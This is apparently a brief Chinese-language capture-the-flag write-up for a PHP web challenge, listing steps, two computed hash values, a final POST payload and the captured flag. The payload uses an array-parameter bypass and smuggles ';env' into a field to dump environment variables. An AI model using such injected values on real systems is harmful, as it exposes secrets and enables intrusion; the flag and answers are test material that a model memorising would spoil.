进入靶场
回去看源码
开始解题
运行得到04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6PHP
运行得到afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b
最终组成payload:White-cat-monitor[]=1&Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env
传post类型时可以用插件或BP
我用BP更方便一点
flag{4117c718-7501-4c0c-827e-323a8d9ea551}